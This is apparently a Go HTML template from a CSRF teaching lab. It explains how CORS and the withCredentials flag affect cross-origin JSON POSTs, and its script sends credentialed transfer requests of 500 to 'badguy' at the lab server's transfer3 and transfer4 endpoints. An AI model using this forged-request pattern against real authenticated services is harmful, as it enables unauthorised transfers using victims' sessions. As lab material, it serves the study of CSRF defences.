{{define "xhrjson"}}<!DOCTYPE html>
<html>
<script>
    function postLevel3(withCredentials) {
        let request = new XMLHttpRequest();
        request.withCredentials = withCredentials;
        request.open("POST", "https://noob-server-499444039048724483.deploys.app/api/transfer3");
        request.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
        request.send(JSON.stringify({ "to": "badguy", "amount": 500 }));
    }

    function postLevel4(withCredentials) {
        let request = new XMLHttpRequest();
        request.withCredentials = withCredentials;
        request.open("POST", "https://noob-server-499444039048724483.deploys.app/api/transfer4");
        request.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
        request.setRequestHeader("X-Requested-With", "XMLHttpRequest");
        request.send(JSON.stringify({ "to": "badguy", "amount": 500 }));
    }
</script>
<body>

<h2>POST with JSON Failed With CORS</h2>

<p>
    This case is to have a form submit as POST using XMLHttpRequest.<br>
    XMLHttpRequest has apply Cross Origin Pocily.<br>
    So browser will block this cross domain asyncronous request.<br><br>

    If the server is CORS enabled, it will pass but to make sure browser send along the cookies use 'withCredentials'.<br>
    But the server need 'Access-Control-Allow-Credentials: true' header to allow this.
</p>

<a href="javascript:void(0);" onclick="postLevel3(true);">POST Level3</a><br>
<a href="javascript:void(0);" onclick="postLevel4(true);">POST Level4</a><br>
</body>
</html>
{{end}}